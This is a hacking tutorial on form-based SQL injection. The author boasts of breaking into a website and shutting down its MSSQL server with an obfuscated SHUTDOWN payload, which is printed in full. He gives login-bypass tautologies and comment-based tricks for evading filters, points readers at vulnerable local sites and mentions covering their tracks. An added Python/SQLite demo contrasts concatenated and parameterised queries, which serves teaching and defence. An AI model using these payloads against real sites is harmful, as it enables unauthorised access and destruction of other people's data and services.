At the time of writing this article, there is one website that I've hacked before using a pretty basic SQL injection. I've helped them patch up most of it, but that doesn't mean it still isn't injectable.
Alright, there is more than one way of SQL-injecting a website. The easiest example is GET parameters. A GET parameter is pretty simple: it is the fid=3 part of the following URL, http://someWebsite.com/forum?fid=3, or in other words anything after the ? is a GET parameter (the query string). Most of the time, seeing a ? followed by the word id or something similar is an instant sign that the value is either A: passed straight into a database query, or B: run through some light processing before being sent to a database.
However, this isn't what I'm going to be talking about in this article. I am going to be talking about basic form-based SQL injection. A form is something like a login page: each time you fill in the fields, the fields are part of the form, including the submit/login button. That's a great place to begin a basic SQL injection attack.
A good way to start a basic attack is to try to force a database error, that is, to break the syntax of the query the page builds around your input. Just to test, type '/*Commented*/ into one of the fields, submit it, then repeat the same thing in the other field, and look out for an error. The single quote closes the string the application wrapped around your input, and the comment tells you whether the database saw your text unchanged. If instead you see a field validation error, that page has input validation and cannot be hacked into that easily.
In that case, look for another way in. Try adding a \ before every tick mark. For example, before we were just typing '/*Commented*/; now it's going to look like this -> \'/*Commented*/. And the list can go on: varying the form and order of the payload like this gets past many simple filters.
On one website I hacked into earlier, I used the following to gain information and pretty much shut down their MSSQL instance.
\'/**/O/**/R /**/1/***/=/***/\'/**/1/**/\'/***/;/***/S/**/H/**/U/**/T/**/D/**/OW/***/N W/**/IT/**/H /**/N/***/OW/***/AI/**/T/**/;/****/-/***/-/****/
Look at the above example. /* and */ delimit a basic comment. Putting a comment such as /* A Comment */ between the tokens of a statement, in place of a space, can mess up a validation system that looks for keywords surrounded by spaces. Note, though, that the database itself treats a comment as a token separator: on SQL Server a comment inside a keyword (S/**/HUTDOWN) turns it into separate tokens and the statement fails to parse, so put comments between tokens rather than inside them. -- is also a comment, but it has no end tag, unlike /* */: it runs to the end of the line, which makes it handy for cutting off whatever the application appends after your input. On MySQL the two dashes must be followed by a space (-- ), or you can use # instead.
Just knowing basic SQL syntax helps a lot with SQL injection. Some of the most popular local sites in your area never know they have bugs until someone begins exploiting them.
One of the most popular exploits is the ' OR '1' = '1' combo (SQL tests equality with a single =, not ==). There are many variations of it, for example:
a' OR 'a' = 'a'
' or '' = ''
There are many more, but I cannot go into depth on all of them here.
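To see the syntax probe from earlier and the tautology and comment tricks above against a real query, here is an added example that is not part of the original article. It is a small Python script using SQLite in place of the MySQL/MSSQL servers mentioned above (SQLite accepts the same '...' quoting and the same /* */ and -- comment styles, minus MySQL's trailing-space rule for --). It builds the kind of concatenated login query a form handler might run, feeds it the '/*Commented*/ probe, the OR tautologies, the -- comment and the comment-in-place-of-space trick, and compares the result with a parameterised query. The users table, the two accounts in it and the function names are all constructed for this example.

```python
import sqlite3

# Constructed sample data for this example (not from the original article):
# a throwaway in-memory user table with two accounts.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory SQLite database seeded with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The classic mistake: form fields pasted straight into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def vulnerable_login(conn, username, password):
    """Run the concatenated query.

    Returns the matched username, None when no row matches, or a string
    starting with 'ERROR:' when the injected text breaks the SQL syntax
    (the database error the article tells you to watch for).
    """
    try:
        row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised version: the driver binds the values separately, so
    quotes and comments inside them are data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    probes = [
        # (username field, password field, what the probe demonstrates)
        ("'/*Commented*/", "", "syntax probe from the article: expect an SQL error"),
        ("admin", "' OR '1'='1", "tautology in the password field"),
        ("a' OR 'a'='a", "x", "same idea in the username field: AND binds tighter, no match"),
        ("x", "a' OR 'a'='a", "the a'/'a' variant in the password field"),
        ("admin'--", "x", "line comment chops off the password check"),
        ("admin", "'/**/OR/**/'1'='1", "comments in place of spaces still parse"),
        ("admin", "'/**/O/**/R/**/'1'='1", "comment inside the keyword OR: syntax error"),
    ]
    for user, pw, note in probes:
        print(note)
        print("  query : " + build_vulnerable_query(user, pw))
        print("  concat: " + repr(vulnerable_login(conn, user, pw)))
        print("  bound : " + repr(safe_login(conn, user, pw)))
```

Two things the output makes visible. First, where the tautology lands matters: with WHERE username = '...' AND password = '...', AND binds tighter than OR, so a' OR 'a'='a in the username field still has the password clause applied to it and matches nothing, while the same text in the password field (or admin'-- in the username field) logs you in as the first row, admin. Second, a comment between tokens (/**/OR/**/) parses exactly like a space, but a comment inside a keyword (O/**/R) is a syntax error. The parameterised version returns None for every one of these probes and only logs in with the real password.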
THIS ARTICLE IS MEANT AS AN INSTRUCTIONAL ARTICLE. THE USE OF THIS ARTICLE IS ETHICAL AND MAY NOT BE TRACED BACK TO ME. BE CAREFUL WHERE YOU USE EXPLOITS, AS YOU MAY NOT ALWAYS BE ABLE TO ERASE YOUR TRACKS.